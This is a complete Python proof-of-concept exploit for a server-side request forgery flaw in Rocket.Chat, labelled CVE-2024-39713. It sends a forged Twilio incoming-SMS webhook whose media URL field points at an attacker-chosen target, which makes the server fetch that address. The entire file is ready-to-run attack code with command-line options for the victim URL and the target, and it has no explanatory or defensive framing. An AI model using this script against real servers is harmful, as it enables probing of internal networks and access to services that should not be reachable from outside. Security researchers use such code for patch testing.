import requests
import json
import argparse


def exploit(url, target):
    headers = {"Content-Type": "application/json"}
    data = {
        "To": "+123",
        "From": "+123",
        "Body": "body",
        "NumMedia": "1",
        "MediaUrl0": target,
        "MediaContentType0": "text/plain"
    }
    
    response = requests.post(url + "/api/v1/livechat/sms-incoming/twilio", headers=headers, data=json.dumps(data))

    if response.status_code == 200:
        print(f"[+] Request sent...")
    else:
        print("[-] Exploit failed")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Rocket.Chat SSRF PoC (CVE-2024-39713)")
    parser.add_argument("-u", "--url", help="Rocket.Chat server URL")
    parser.add_argument("-t", "--target", help="SSRF target")
    args = parser.parse_args()
    
    print("[+] Rocket.Chat SSRF PoC (CVE-2024-39713)")
    
    exploit(args.url, args.target)